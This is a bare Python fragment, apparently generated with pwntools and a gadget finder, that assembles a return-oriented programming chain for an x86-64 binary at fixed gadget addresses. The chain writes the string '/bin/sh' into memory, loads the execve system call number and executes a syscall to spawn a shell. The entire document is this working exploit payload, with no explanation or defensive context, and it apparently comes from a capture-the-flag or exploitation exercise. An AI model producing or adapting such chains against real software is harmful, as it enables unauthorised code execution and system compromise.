payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x4361ce)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x80)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40f4ea)
# 0x000000000040f4ea: mov dword ptr [rbp - 0x4c], edi; jmp rsi; 
payload += b''
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4360bc)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x6e69622f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x40125d)+p64(0x0)+p64(0x40f4ea)
# 0x000000000040f4ea: mov dword ptr [rbp - 0x4c], edi; jmp rsi; 
payload += b''
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4360c0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x68662f)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x4017d3)+p64(0x0)+p64(0x40f4ea)
# 0x000000000040f4ea: mov dword ptr [rbp - 0x4c], edi; jmp rsi; 
payload += b''
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x36b35f97)+p64(0x4141ad)
# 0x00000000004141ad: xchg eax, edi; ret; 
payload += p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x3b)+p64(0x4141ad)
# 0x00000000004141ad: xchg eax, edi; ret; 
payload += p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x436070)+p64(0x424803)
# 0x0000000000424803: syscall; 
payload += b''
